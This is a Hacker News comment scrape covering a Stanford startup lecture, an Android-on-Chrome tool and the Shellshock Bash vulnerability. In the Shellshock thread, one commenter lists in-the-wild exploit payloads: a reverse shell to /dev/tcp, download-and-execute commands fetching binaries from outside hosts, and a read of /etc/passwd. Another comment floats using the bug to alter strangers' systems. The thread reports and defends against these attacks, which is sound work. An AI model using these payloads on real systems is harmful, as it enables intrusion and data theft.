philipDS 2 days ago 8 replies      
I made some notes while watching/listening. Might include minor errors or misinterpretation on my side

4 critical parts: Idea, Team, Product, Execution

1. Idea

-> Good startups take about 10 years

-> Startup should feel like an important mission

-> Hardest part coming up with great ideas: best look terriblea t the beginning (e.g. search engine, social networks limited to college students without money, a way to stay at stranger's couches)

-> "Today only a small subset of users want to use my product, but I'm going to get all of them"

-> You need to believe and willing to ignore naysayers

-> Most people will think your idea is bad: be happy. they won't compete. it's not dangerous to tell people your idea.

-> it's okay if it doesn't sound big at first. first version should take over a small specific market and expand from there. unpopular but right

-> take the time to think about how the market will evolve. market size in ~10 years. think about growth rate of the market instead of its current size. small, but rapidly growing market! people are desperate for a solution

-> you cannot create a market that does not exist

-> there are many great ideas, pick and find one you really care about.. "SW is eating the world"

-> "Why Now?" - dixit Sequoia - have a great answer to this question

-> Build something that you yourself need. You'll understand it a lot better.

-> Get close to your customers. Work in their office or talk to them multiple times a day

-> If it takes more than a sentence to you know what you're doing, it likely is too complicated

-> "Do more when you're a student." Think about new ideas and meet potential co-founders

-> Think about the market first and you'll have a big leg up

2. Product

-> Great Idea > Great Product > Great Company

-> Until you build a great product, almost nothing else matters

-> Sit in front of the computer working on product, or talk to your customers

-> Biz Dev, Raising Money, Raising Press, Hiring are significantly easier when you have a great product

-> Step 1: build something that users love

-> YC is all about: Exercise, Eat, Sleep, Work on Product and Talk to Customers

-> "It's better to build something that a small number of users love, than a large number of users like"

-> Get growth by word of mouth. This works for consumer as well as enterprise products. You'll see organic growth. If you don't have some early organic growth, then your product isn't good enough. It's the secret sauce to growth hacking.

-> Breakout companies always have a product that's so good that grows on word of mouth

-> Great products win. Make something users love.

-> Keep it simple. Look at first versions of Google, Facebook, iPhone

-> Founders care about small details. They're fanatical

-> One thing that correlates with success is hooking up PagerDuty to their ticketing system. Response time within an hour.

-> Go recruit your first users by hand to get feedback every day.

-> When everyone tought Pinterest was a joke, Ben Silbermann walked around coffee shops in Palo Alto to convince people to use Pinterest. He set Pinterest to the home page in the Palo Alto public library so people would discover the website. Do things that don't scale. Read Paul Graham's essay.

-> Create a tight feedback loop. What do users like? What do they pay for? What would make them recommend it?

-> Try to keep your feedback loop going for all of your companies' life

-> Do sales and customer support yourself in the early days. This is critical. Do not hire these people right away.

-> Keep track of metrics. Look at active users, activity levels, cohort retention, revenue, etc. Be brutally honest if they don't go in the right direction

-> If you don't get your product right, nothing else in this class will matter.

Why start a startup?

-> "It's glamorous", "You'll be the boss", "Flexibility", ...

-> Entrepreneurship gets romanticized

-> The reality is not so glamorous. It is a lot of hard work. You're sitting at your desk, focused, figuring out hard engineering projects. It is quite stressful.

-> Founder depression is a real thing. If you start a company, it's gonna be extremely hard

-> You have loads of responsilibity

-> You're responsible for the opportunity cost of the people who decide to follow and help you out

-> You're more committed. A founder cannot leave a company. For 10 years if it's going well. Probably for 5 years if it's not going well.

-> "Number one role of a CEO is managing your own psychology"

-> You're always on call, you're a role model. You'll always be working anyway

-> If you joined Dropbox or Facebook early on, your financial reward might be a lot better than when starting a startup

-> If you join a later stage startup, you have more impact - massive userbase, existing infrastructure, work with an established team. E.g. Brett Taylor was employee #1500 at Google and he invented Google Maps. He got a big financial reward for this.

-> What's the best reason? You can't NOT do it. You have to make it happen

-> Do it out of passion

-> The world needs it (if not, go do something else) and/or the world needs you (you're well-suited to do it). The world needs you somewhere, find where.

tucaz 2 days ago 11 replies      
I've been watching it for 8 minutes as of now and despite the fact that the content looks good it really bores me to death that he is reading the whole thing like a robot. It does not sound like a natural converstation or presentation. Does anyone else share this feeling?
mbesto 2 days ago 3 replies      
Dustin talks about Financial Reward and Impact of "why to do a startup" for examples like Facebook and Dropbox here: https://www.youtube.com/watch?v=CBYhVcO4WgI#t=2161

Are these values correct? If you join Dropbox as employee #100 with 10bp, you're 10bp is going to get massively diluted through subsequent rounds, no? Isn't it more like $1-2mil? And also this is wealth on paper, which means that you don't all of the sudden have $10mil sitting in the bank. I don't think he explains that but that's how it's portrayed, and is probably worth explaining, given the audience.

cjmb 2 days ago 2 replies      
On Sam's part -- am I the only one who got the "heard this before" feeling? Obviously he attributed everything pretty appropriately, but I thought I could've placed 50-75% of his sentences in the "Summary" sections of various PG essays, Peter Thiel writings, and other luminaries of the startup-sphere.

I'm not saying it was wrong or that his delivery was bad. But I remember reading the Class Notes from Thiel's class after Blake made them available and thinking "Wow, there's some original thoughts in here I haven't come across before."

Maybe it's because PG already put it all to paper, and some of these other figures just added post scripts. Maybe it was a solved problem by the time Sam got a seat at the table. Just some food for thought. Looking forward to the other lectures regardless.

dheer01 1 day ago 1 reply      
Disagree completely with the very first opinion expressed - 'Don't do a startup just to do one - do it only if you really want to solve a problem'.

India has produced about 3 big ~billion dollar compaines in the recent past - inmobi, flipkart, druvaa. None of the founders really started to 'solve' a problem they were passionate about. What they were really passionate about was just 'starting up' - and based on their personal strengths, industry knowledge and what they thought could be sold, stumbled on these big businesses. This was probably true for HP too.

It is absolutely ok to do a startup just for the heck of it. Get in the game and find out the intersection of what you can build and what a customer will buy. If you build a big business - the passion will follow. Do not forget to bullshit though on your big interview on how the so solved problem kept you awake at nights - it makes for some good reading and impressionable pr.

bcjordan 1 day ago 0 replies      
To temper some of the nit picks, just wanted to say this lecture felt insightful and fun to watch. I hope YC continues this trend of investing effort in shareable advice content in the spirit of pg's essays.

This is the first time a lot of the YC flavor of startup how-to material has been presented in a lecture video format[1]. I suspect much of the long-term audience of these lectures wouldn't have come across pg's essays, Blake Masters' Peter Thiel startup notes or Dustin Moskovitz's excellent Medium posts before. Maybe some lecture watchers were allergic to long-form articles, or maybe some would rather receive a weekly email with videos. Myself, I consume this sort of material on my walk to work, either text-to-speeching essays or listening to lectures. The video lecture format was especially fun, I watched it full screen on the TV while eating an enchilada and poking my fiancee about points she might find relevant to her side project. How often do you get to consume this sort of content like that?

Having read pg's essays[2], I still had a number of "aha!" moments from Sam's slides and hearing his presentation. And hearing Dustin describe in his low-key tone why you should be employee 1,000 at an obviously successful startup rather than start your own, and backing it up with charts and photo-jokes about the elephant in the room was just entertaining. Seeing "this is how we'll teach you to do this thing. Here's an expert on why not to do this thing." is not always the type of juxtaposition you get with standalone online essays.

Looking forward to the next lecture. I'd say it's well worth the time and opportunity cost of putting this all together, so thanks all involved.

[1]: Yes, some Lean Startup and Principles of Entrepreneurship flavored material has been presented in lecture format before, but not YC lensed AFAIK.

[2]: Okay, I skipped the early seemingly pure-Lisp-focused ones. Though like Zen and the Art of Motorcycle Maintenance isn't about a long motorcycle trip, and maybe pg's Lisp essays are not really all about writing Lisp?

kartikkumar 1 day ago 1 reply      
One thing that bothered me about the lecture was reinforcement of the idea that working hard is the same as working long. I can appreciate the fact that at times as a founder you have to work all hours of the day, but surely this is not the optimum scenario for maximum productivity. If I look at my own work situation currently, it's abundantly apparent to me that the law of diminishing returns affects me strongly after working 8-10 hrs straight.

I would have expected the message to be that the most successful founders in the long-term are the ones that figure out the right work/life balance, to ensure they don't burn out. In other words, successful founders are able to be focussed and driven for the hours that they work, and in recharge-mode when offline.

This is intuitively what I would have expected and I'm curious if the message from the lecture of "work all day, everyday" is really right.

yatoomy 9 hours ago 0 replies      
I'm interested in Thiel's upcoming lecture. It seems like there has been a hard shift from "move fast/lean/mvp/pivot" to "make a monopoly". Economically speaking, it is accurate. Hopefully it will motivate people to go after problems previously taboo, ie healthcare, education, finance etc, and less about messaging and photo apps. Our world may depend on it.
smuss77 2 days ago 10 replies      
@3:12: "There are much easier ways of getting rich." Could I get some examples? Thank you!
agentultra 1 day ago 0 replies      
Great presentation and very clear that the rest of the course will be focusing on advice for SV-style hyper-growth startups.

There's still some good advice for those of us not interested in that life style. I was particularly taken with the idea of building something that just a handful of people will really love. Having a rapt-audience for your product would be a huge win if you decide to build more, scale up, or sell out.

I think it's really good that they're at least trying to convey how difficult building the style of companies they're talking about can be. I can appreciate how challenging that must be. The cultural yard-stick for success these days are valuations and IPOs. There's a ton of pressure to go that route especially from YC. I'm glad they're being conscientious about it even if they don't 100% succeed at removing some of the glimmer from the stars in peoples' eyes.

There's nothing wrong with wanting to start a smaller enterprise and aspire to keep just a handful of customers you know by name.

Reltair 1 day ago 1 reply      
The recommended reading from the final slide:

- The Hard Thing About Hard Things

- Zero to One (CS 138A)

- The Facebook Effect

- The 15 Commitments of Conscious Leadership

- The Tao of Leadership

- Nonviolent Communication

jduhamel 2 days ago 0 replies      
The presentation style is a bit rough but the material is gold.
bayesianhorse 1 day ago 1 reply      
There are easier ways to get rich? For Stanford Graduates, maybe. For those who don't have a degree in an ultra-paying job, I'd really like to know an easier way.

I'm usually sceptical about start-up chances, I know how much work it means, and I know that a lot of early-stage employees get rich, too. Yet, I don't think you can get rich this fast/easy with a modest degree... Even as early-stage employee often you'll still get a raw deal or you overestimate their chances of success.

jtwebman 1 day ago 0 replies      
Wow this was good information. It really got me thinking on what my reasons are and how bad they might be. Did anyone else get that from this?

I would also love if they cover how you work on a startup if you still have the 40 hours a week programming job as well. And how to avoid getting in trouble or legal issues with your job.

bramgg 2 days ago 2 replies      
@2:22: "You may still fail. The outcome is something like Idea x Product x Execution x Team x Luck, where Luck is a random number between 0 and 10,000, literally that much."

What does that mean? I'm not trying to rip on the video or anything like that, but am genuinely curious as to how much luck Sam Altman thinks is involved in a startup.

rdlecler1 1 day ago 2 replies      
Sam: "Step 1, build something that users love"

How does this compare with an MVP approach where you put something out there first and test the market. Then there is the issue of runway. With enough time, you can start with an MVP and iterate in private beta until users love it, but in many cases a founder is not going to have that kind of runway. They have just enough resources to put something together, and they're going to have to go out to the market with that and iterate on the fly. Unfortunately, once you do get out there and need to take on all of the other responsibilities, then that's time taken away from building a great product.

coralreef 1 day ago 1 reply      
Sam mentioned that the idea was actually quite important. I recall PG saying that YC would often invest in the team because ideas change and aren't as important as good founders.

Anyone have thoughts on this?

lukasm 2 days ago 2 replies      
I find it artificial when the lecturer reads the presentation - it's not a joy to listen.
steakejjs 2 days ago 0 replies      
This seems like a really valuable recruiting tool for YC. Start early at Stanford, groom freshman to have a great mindset and understanding of the fundamentals, fund them and make money.

YC is still a for-profit company, after all.

dkaplan 1 day ago 0 replies      
Why did we submit questions if the video was just going to cut out at the Q&A
petersouth 2 days ago 1 reply      
Sam Altman's law of conservation of how much happiness you can put into the world with the first product from a startup -> the total amount of love is the same it's just a question of how it's distributed.
piotry 1 day ago 0 replies      
Funny that I just wrote about how I was considering killing a startup I started: https://medium.com/@piotr/i-failed-82b9469977ac?source=lates...

Probably the best way to know how to build a successful one is knowing how to build one that won't fail!

hayksaakian 1 day ago 2 replies      
Sam kept bringing up the 10 year number

But: YC (and therefore every YC company) is < 8 years old

What startups succeeded after this long (AND were still actually considered startups)

simonebrunozzi 1 day ago 0 replies      
I also don't agree that working on a startup should mean no work-life balance. There's a limit to how productive you can be, and working 90 hours/week is not going to make you more productive than working 45 hours/week. If you work too much, you'll do more mistakes.Ryan Carson, founder of TeamTreeHouse, can teach us a lot about it. http://ryancarson.com/
AzmD 1 day ago 0 replies      
Ideas are important ... but if Ycombinator stresses so much on the idea being really great then they should take these lines off their website (its on the "Apply" page)

"Your idea is important too, but mainly as evidence that you can have good ideas. Most successful startups change their idea substantially."

dkural 1 day ago 1 reply      
I disagree that a startup should commonly start with an "idea". Start with an unmet need people are willing to pay for. Or take an existing category with a lot of bad products and make a truly better one that improves every aspect of the experience. Often, you'll see many startups working on the same "idea". Something like Google is truly rare (a genuinely innovative approach to search).
bobbles 2 days ago 0 replies      
Are transcriptions of these videos going to be provided?

It's much easier for me to consume lectures as text rather than watching the video.

ckvamme 1 day ago 0 replies      
I posted some casual, but in depth notes on my site for anyone wanting to skip the video:


steve_taylor 1 day ago 0 replies      
It's refreshing to see such importance placed on the idea and building a product that users love.
howradical 1 day ago 0 replies      
Here are some timestamped notes synced with the video: https://timelined.com/how-to-start-a-startup/lecture-1-how-t...
lawsohard 1 day ago 0 replies      
looks like rap genius is putting up a full transcript http://tech.genius.com/Sam-altman-how-to-start-a-startup-lec...
ThomPete 2 days ago 6 replies      
Don't get me wrong I love Sam Altman I love y-combinator but a small part of me is thinking that a good first step to start a startup is to not watch that video and find your own way. Not because it's probably not great but because a startup is not a formula.

Your path is your own.

smaili 1 day ago 0 replies      
Can non-Stanford students drop in or is this for students only?
gadders 1 day ago 0 replies      
Just a quick question - are these a Sam only initiative, rather than YC? Is that why they are on Sam's domain?
gorkemyurt 2 days ago 1 reply      
its really sad that he is reading the presentation..
7Figures2Commas 2 days ago 0 replies      
"All the advice in this class is geared towards people starting a business where the goal is hyper-growth and eventually building a very large company. Much of it doesn't apply in other cases and I want to warn people up front that if you try to do these things in a lot of big companies or non-startups it won't work."
xavierkelly 1 day ago 0 replies      
This is a really good video lesson. I fell inspired to work harder on my dreams of growing my startup.
polskibus 1 day ago 1 reply      
Is there a download link for the video to make offline viewing possible?
graycat 1 day ago 2 replies      
Just watched the lecture.

The first part of the lecture was on the "Idea", andI want to give an alternative approach.

First, do I believe that what Altman describes canwork and is what he has seen has worked? Definitelyyes.

Second, is that all that can work? I don't thinkso.

Third, do I suggest that the alternative approach Idescribe here will be common and/or always betterthan what Altman describes? No. Sometimes better?I do believe so. But even if the alternativeapproach is rare, that should not be a huge obstaclesince the success Altman is talking about, the goal,is also rare. That is, for the rare successes, weshould expect that some of the means will also berare and not common.

But for the alternative approach, given that it israre, we should have some solid evidence of itseffectiveness, and I believe that we can.

I want to propose that it can be possible to have anidea, test it, essentially just on paper, and, if itpasses the test, be quite sure the resulting productwill be good and fairly sure the resulting companywill be successful.

Yes, I'm proposing that the alternative approachprovides a way to have the idea be by far the mostimportant part of the work and the rest, e.g., theexecution, be routine.

Or I would say that a good idea is one that makesit through the filters of my alternative approach.Then I am claiming that with a bad idea, yes,execution is everything but with a good ideaexecution is routine.

Yes, to me, the ideas like Altman describes lookto me as far too unpromising to be taken seriouslyand promise that, yes, indeed, execution will bemany times more difficult than the idea. Indeed,Altman is admitting that many start ups fail, thatbuilding a successful start up is difficult. Iwould agree that, starting with a bad idea, buildinga successful start up is difficult.

Now, for the alternative approach for finding a goodidea for a start up:

First, the alternative approach is very selective,that is, rejects a lot of ideas. Some of the ideasthe approach rejects will be able to be the basis ofsuccessful companies. The alternative approachrejects ideas when it just cannot build a rock solidcase that the idea is good. E.g., the alternativedoes not know how to conclude that the ideas forFacebook or Twitter would lead to success. Thealternative wants to accept only good ideas and indoing so will reject a lot of good ideas. Thealternative approach asks for a lot from an idea,and many good ideas will not have that much.

Second, Altman does emphasize that a need and acorresponding solution one person sees in their ownlife can be relevant. Okay, I've been there anddone that, that is, I've seen needs and solutions.

Third, what I'm proposing for an alternative is, atleast in broad terms, and compared with what Altmandescribes, much older, much more thoroughly tested,and with a much better, really excellent, trackrecord.

Actually, we all know at least something, maybe alot, about the alternative and its track record. Ilearned about the alternative early in my careerdoing mostly US DoD projects around DC and also someother experiences, but there is much moreinformation about the alternative readily availablefar from me.


(1) Need.

To make the alternative work, we have to start witha suitable need, i.e., market need, that is, asuitable problem to solve. We want the first goodor a much better solution to be, obviously, nodoubt, a "must have" and not just a "nice to have".

Next, for this need, we want to find the first goodor a much better solution, presented just on paper.

Then we want to evaluate the solution, also just onpaper. Sorry, no, we don't "get out of thebuilding" and talk to other people.

Big example of such a need? Okay, we'd like to havea safe, effective, inexpensive one pill taken onceto cure any cancer. So, yes, early on, forFacebook, Twitter, Snapchat, a lot of doubt. Forsuch a cancer pill, we have "no doubt"; to know thiswe don't have to "get out of the building", askpeople, throw trial solutions against a wall to seeif there is interest, etc.

(2) Solution.

Given the need from (1), we try to find a solution.If we fail here, and likely we will, we return to(1) and find another need. E.g., clearly so far theone pill cure for any cancer will fail here for atleast a long time.

We want a solution that we are sure, "no doubt",will be the first good or much better.

Here's a way: Start with the real problem and seewhat about it we can assume. Then convert thisproblem and its assumptions into a mathematicalproblem. So, we are limiting ourselves to needsthat lead faithfully to mathematical problems.Sorry, no intuitive heuristics need apply.

Next find a mathematical solution.

Develop the mathematical solution just on paper, ascarefully done theorems and proofs, and thenseverely check the proofs.

Then observe that it is totally clear that themathematical solution will be fully close enough tothe first good or much better solution we want forthe need.

If any of the work here in step (2) fails, thenreturn to step (1)

(3) Product.

Write software to do the data manipulationsspecified by the mathematical solution. Severelycheck the software. That's essentially the product.

If fail here, then return to (1).

Track record? Okay:

(A) GPS.

(B) The version of GPS done first by the US Navy forthe SSBNs.

(C) Beam forming in passive sonar.

(D) The A-bomb of WWII -- all three exploded just asplanned.

(E) The H-bomb of the 1950s -- first test, 15million tons of TNT.

(F) The SR-71, for Mach 3+, 80,000+ feet, 2000+miles without refueling; proposed by Kelly Johnsonjust on paper; built and flown just as proposed.

(G) Keyhole satellite, essential a Hubble, beforeHubble, but aimed at earth instead of space.

(H) The F-117 stealth, essentially a modified F-16,flew as planned, through Saddam's anti-aircraftartillery without a scratch.

(I) The airplane the Wright brothers took to KittyHawk, NC.

(J) Phased array radar for Aegis class ships.

(K) High bypass turbofan engines.

(L) RSA encryption.

(M) Hubble.

(N) LHC.

(O) COBE, WMAP, and Planck.

And there are many more. Such projects that failedin execution? Tough to find. Batting average?Near 1000.

Right: Projects A-O are all just technicalprojects. Right. But in each case they providedthe intended solution for the need. As we haveexplained, to have a successful technical solutionlead to a successful solution in business, we wantsuch a solution to be a "must have"; else we returnto (1).

The high bypass turbofan jet engine a commercial"must have"? Darned right: It saves an ocean ofexpensive jet fuel. How? Simple: Burning jet fuelreleases energy. Want to convert that energy tokinetic energy and get the resulting momentum. Butfor mass m and velocity v, kinetic energy is (1/2)mv^2 and momentum is just mv. So, we pay in energy(1/2) mv^2 and get in the momentum we want mv.

So, since in kinetic energy we have v^2 but inmomentum have just v, to get more of our desiredmomentum from our given, available energy, we want mto be large and v to be small. So, mostly we wantto use the hot gasses from the combustion to turn abig ducted propeller that moves a huge mass of airat a low velocity. Instead, the military jetengines intended for supersonic speeds, and longused in commercial aviation because they wereavailable, move a smaller mass at high velocity.So, for commercial, subsonic flight, a high bypassturbofan is a "must have". Then have the first goodone or a much better one, as we have assumed, andvery much should have a successful business.

reelgirl 1 day ago 0 replies      
I loved the video and it really encouraged me to keep on trying.
simonebrunozzi 1 day ago 0 replies      
Sam, your voice sounds very irritating to me. Sometimes too fast, no "tempo". I think you should change the way you deliver your points to a classroom. (constructive feedback, not rant
hanley 2 days ago 0 replies      
Very interesting lectures and it's great that they are doing this. Both of the speakers could benefit from a public speaking class though.
gbachik 2 days ago 0 replies      
It was so good I wish It was thursday.

I want mooooore!

pmosh 1 day ago 0 replies      
subtitles please!!
porter 2 days ago 1 reply      
Ycombinator leading the way once again. Looking forward to this!
Chromeos-apk Run Android APKs on Chrome OS, OS X, Linux and Windows
469 points by ProfDreamer  6 days ago   92 comments top 19
cryptoz 6 days ago 3 replies      
This is amazing. There's a long reddit thread and some additional instructions here: http://www.reddit.com/r/Android/comments/2gv035/you_can_now_...

From the README:

> Soundcloud - Works, crashes when playing sound

Funny definition of 'works'.

byuu 6 days ago 5 replies      
Can anyone explain how this differs from using an Android emulator? (http://developer.android.com/tools/help/emulator.html)

Is it a matter of features, speed, or convenience? Obviously, all of those can be overcome, be it as a fork of the official emulator or as a third-party emulator. For instance, this new Chrome extension must be the same thing under the hood: a Dalvik runtime, possibly an ARM->Intel recompiler for any NDK applications, etc.

I figured the only reason this wasn't done to mass effect already was because it wasn't in demand. But if it's so desirable, surely creating an actual emulator would be superior to hacking up web browser extensions and ostensibly playing cat-and-mouse with Google over this?

AdmiralAsshat 6 days ago 3 replies      
Neat proof of concept.

I hope Google gets us something official sooner rather than later. It's a little disheartening that I own a Chromebook Pixel and yet I can't use Google's own hardware to design or test Android apps without installing Eclipse on a sideloaded Linux chroot via Crouton.

kasabali 6 days ago 2 replies      
I will absolutely go nuts if this thing manages to run OneNote on my Debian desktop.
wzsddtc 4 days ago 0 replies      
We worked with the ARC team at Vine as a launch partner, there were 0 modifications that we had to do to get it working on ARC. The only difference was that the "bugs" we had to fix were all reproducible on Nexus devices as well BUT the threading model had to be more strict on ARC in terms accessing system resources.
oldgun 6 days ago 0 replies      
This is amazing.

I hope Google could really carry this project as far as possible. The next several major issues would be polishing up the platform, eliminating the bugs, unifying the android and chromebook development interface. Think of one day when android developers could actually design apps for the desktop. How cool would that be?

That's when Microsoft should really get worried.

niutech 5 days ago 1 reply      
Running Android apps in Chrome on desktop is huge! I'm glad that the ARC runtime I provided in https://github.com/vladikoff/chromeos-apk/issues/5 helped to achieve this.
bla2 5 days ago 0 replies      
Interesting, Google announced working on this on this year's I/O and posted the first apps just one week ago ( http://chrome.blogspot.com/2014/09/first-set-of-android-apps... ).
tracker1 6 days ago 1 reply      
Hope this means good netflix support in Linux.
Flenser 1 day ago 0 replies      
could you use this to run ChromiumTestShell.apk on windows for testing android chrome rendering?

[1] http://commondatastorage.googleapis.com/chromium-browser-con...

bmelton 6 days ago 1 reply      
So, now we can write apps in Angular that run on the web and compile to Java so that we can install them to Android, running on ChromeOS, running on OSX.


Edit: Perhaps the punny nature of this is deserving of downvotes, but the statement above is the actual use case I presented to a co-developer, discussing how this project could be of use to our app, which was built with Ionic.

FWIW, there's value in it (the app, not necessarily this post) even if it means having to unplug fewer devices to swap them out with different devices to test.

asadotzler 6 days ago 0 replies      
Java makes a triumphant comeback in the browser?
kyrrewk 5 days ago 0 replies      
I have had some success running Android x86 (http://www.android-x86.org/) in VirtualBox.
bussiere 5 days ago 0 replies      
Fuuuuu Out There a good game only available on mobile crash with this solution ...

Dam but it looks full of promise i hope one day it will work well ...

mattfrommars 5 days ago 1 reply      
How is this really good? Android apps are really good but they are designed for touch interface on mobile devices, not desktop.
em3rgent0rdr 5 days ago 0 replies      
Awesome! Works for me on arch linux running latest chromium. Much faster than running android emulator!
chj 6 days ago 0 replies      
Google needs to do this.
mjcohen 4 days ago 0 replies      
Want Open Office!
stuaxo 6 days ago 0 replies      
Its about bloody time!
Everything you need to know about the Shellshock Bash bug
457 points by sjcsjc  13 hours ago   260 comments top 45
jgrahamc 12 hours ago 10 replies      
This is being actively exploited. We (CloudFlare) put in place WAF rules to block the exploit yesterday and I've been looking at the log files for the blocking to see what's going on. Have been seeing things like:

    () { :;}; /bin/ping -c 1 198.x.x.x    () { :;}; echo shellshock-scan > /dev/udp/example.com/1234    () { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1    () { test;};/usr/bin/wget http://example.com/music/file.mp3 -O ~/cgi-bin/file.mp3    () { :; }; /usr/bin/curl -A xxxx http://112.x.x.x:8011    () { :; }; /usr/bin/wget http://115.x.x.x/api/file.txt    () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd    () { :; }; /bin/bash -c "if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget 82.x.x.x:1234/v64 -O /tmp/.osock; else /usr/bin/wget 82.x.x.x:1234/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &
If you are one of our (paying) customers the rules to block this exploit are enabled automatically.

PeterWhittaker 9 hours ago 5 replies      
Folks, for what it's worth, here is a management briefing I wrote this morning. Please feel free to re-use, but please do give proper attribution. Please do comment and correct as appropriate.

Summary: Briefing for management on activities to minimize impacts of the "shellshock" computer vulnerability.

Status: Testing underway. Initial appraisals are that public-facing systems are likely not subject to shellshock. NOTE: The situation is fluid, due to the nature of the vulnerability. Personnel are also reaching out to hosting providers to assess the status of intervening systems.

What is it? A vulnerability in a command interpreter found on the vast majority of Linux and UNIX systems, including web servers, development machines, routers, firewalls, etc. The vulnerability could allow an anonymous attacker to execute arbitrary commands remotely, and to obtain the results of these commands via their browser. The security community has nicknamed the vulnerability "shellshock" since it affects computer command interpreters known as shells.

How does it work? Command interpreters, or "shells", are the computer components that allow users to type and execute computer commands. Anytime a user works in a terminal window, they are using a command interpreter - think of the DOS command prompt. Some GUI applications, especially administrative applications, are in fact just graphical interfaces to command interpreters. The most common command interpreter on Linux and UNIX is known as the "bash shell". Within the last several days, security researchers discovered that a serious vulnerability has been present in the vast majority of instances of bash for the last twenty years. This vulnerability allows an attacker with access to a bash shell to execute arbitrary commands. Because many web servers use system command interpreters to fulfill user requests, attackers need not have physical access to a system: The ability to issue web requests, using their browser or commonly-available command line tools, may be enough.

How bad could it be? Very, very bad. The vulnerability may exist on the vast majority of Linux and UNIX systems shipped over the last 20 years, including web servers, development machines, routers, firewalls, other network appliances, printers, Mac OSX computers, Android phones, and possibly iPhones (note: It has yet to be established that smartphones are affected, but given that Android and iOS are variants of Linus and UNIX, respectively, it would be premature to exclude them). Furthermore, many such systems have web-based administrative interfaces: While many of these machines do not provide a "web server" in the sense of a server providing content of interest to the casual or "normal" user, many do provide web-based interfaces for diagnotics and administration. Any such system that provides dynamic content using system utilities may be vulnerable.

What is the primary risk? There are two, data loss and system modification. By allowing an attacker to execute arbitrary commands, the shellshock vulnerability may allow the attacker to both obtain data from a system and to make changes to system configuration. There is also a third risk, that of using affected systems to launch attacks against other systems, so-called "reflector" attacks: The arbitrary command specified by the attacker could be to direct a network utility against a third machine.

How easy is it to detect the vulnerability? Surprising easily: A single command executed using ubiquitous system tools will reveal whether any particular web device or web server is vulnerable.

What are we doing? Technical personnel are using these commands to test all web servers and other devices we manage and are working with hosting providers to ensure that all devices upon which we depend have been tested. When devices are determined to be vulnerable, a determination is made whether they should be left alone (e.g., if they are not public facing and patches are either not yet available or would be disruptive at this time, or if there are other mitigations or safeguards in place), patched (e.g., if patches are available and are low impact), or turned off (e.g., if patches are not available, risk is high, and the service is not mandate critical).

Updates to this briefing will provided as the situation develops.

sequoia 10 hours ago 7 replies      
Read a bit about this because I didn't understand CGI. tl;dr version of what's going on here, if I'm not mistaken (assuming apache/php for this example):

1. Web server (apache) gets request to route to CGI script (PHP)

2. Per the CGI spec, apache passes the request body to PHP as stdin & sets the HTTP headers as environment variables, so PHP can access them

3. In the PHP script, `exec`/`passthru`/`shell_exec` etc. is called to do something in the shell/on the system level. This spawns a new shell (which may be bash)

4. bash interprets the environment variables set by apache

The rub lies in step 4: when bash interprets an environment variable called `HTTP_USER_AGENT` containing the value `() { :;}; /bin/ping -c 1 198.x.x.x` it "gets confused" & interprets that first part (before the second semicolon) as a function, then executes the second part as well

Hopefully this answers the "how does the exploit get from the browser to bash?"

Further question: "If I do not use exec/shell_exec/popen etc, am I still vulnerable (just by virtue of using mod_php)?" AFAICT No, but I am not really sure (I hope someone clears this up).

Additional note about PHP: disabling all these passthru type functions has been recommended for years: http://www.cyberciti.biz/faq/linux-unix-apache-lighttpd-phpi...

f- 10 hours ago 1 reply      
Since the post is relatively non-technical, I'd like to underscore that there are substantial concerns with the original and the followup patch, because with or without it, the underlying bash code parser is still exposed to the Internet. Nobody has posted an RCE vector that would be universally bad for the patched version, but several people have already identified "hmm, that's unexpected" types of global side effects when attacker-controlled strings are parsed as functions by bash. More is likely to come.

As of today, based on our conversations on oss-security, there is a third, unofficial patch that takes a much saner approach of isolating exported functions in a distinct namespace:


Especially in high-value or high-risk scenarios, you may want to give it a try. And if you're interested in the reasons why the original patch is problematic, check out:


philh 12 hours ago 0 replies      
Skimming this post, it appears to only reference CVE-2014-6271 and not CVE-2014-7169, so probably not 'everything you need to know'.

(Searching for '=>' doesn't show anything, which I would expect it to if -7169 was mentioned.)

donatj 13 hours ago 5 replies      
So trying to understand the issue here, is this actually a bash thing or a problem with the web server forwarding commands to bash? I don't understand why bash would be listening to network traffic on its own.
Animats 6 hours ago 0 replies      
If you're running Apache on Linux/UNIX, and don't absolutely need CGI, it's straightforward to turn it off in Apache.

Put a "#" in front of

LoadModule cgi_module modules/mod_cgi.so

in /etc/httpd/conf/httpd.conf. This prevents the code that runs CGI scripts from even being loaded with Apache, and will totally disable all CGI scripts. Apache is willing to execute CGI scripts from far too many directories, and many Linux distros have some default CGI scripts lying around.

This will break CPanel, but not non-CGI admin tools such as Webmin. I can't say anything about PHP; we don't use it.

People are out there probing. This is from an Apache server log today from a dedicated server I run. - - [24/Sep/2014:23:08:56 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 338 "-" "() { :;}; /bin/ping -c 1"

The source is on "i3d.net", which is a hosting service in Rotterdam NL. So someone is running probes from something bigger than a desktop. I sent their support people a note.

nacnud 10 hours ago 6 replies      
Unless I've missed something, could some benevolent person use the bug to cause remote systems to run something like "sudo apt-get update && sudo apt-get install bash", to patch the vulnerability automatically? (it makes lots of assumptions, but surely it's better to have some patched systems as a result.
Animats 5 hours ago 2 replies      
A question worth asking: how long has this been exploited? If you have years of Apache logs, go back through them with "grep" and look for attempts to exploit this vulnerability. Report the earliest date on which you find a hit. Thanks.
neuralk 10 hours ago 2 replies      
For Windows devs: remember that some tools and libraries come with bash (and some may not even tell you explicitly).

For instance, msysgit has the vulnerability[1]:

  $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  vulnerable  this is a test
[1] from the comments on the blog in the OP

idorosen 10 hours ago 1 reply      
For Mac OS X, until Apple releases a software update, I've applied the original CVE-2014-6271 (shellshock) patch and am going to apply the CVE-2014-7169 patch as well once it passes review. Repository and instructions to reproduce without trusting me are located here:


thyrsus 6 hours ago 1 reply      
Is there a way of preventing functions from being imported from the environment, but still allowing some variables in?

My experiments with

#!/usr/bin/env -i sh


#!/usr/bin/env - sh

...have not obtained what I'm after.

The problem being that functions take precedence over names in the file system, so

    bash-4.2$ env '/bin/cp=() { echo oops;}' /bin/sh -c '/bin/cp /tmp/foo /tmp/bar'    oops

mrfusion 11 hours ago 6 replies      
So if your server is set up with limited permissions for the apache-user, are you still at risk?

I don't think the apache-user if properly restricted can write to directories, or even read most of the system files?

jamroom 13 hours ago 2 replies      
From the article:

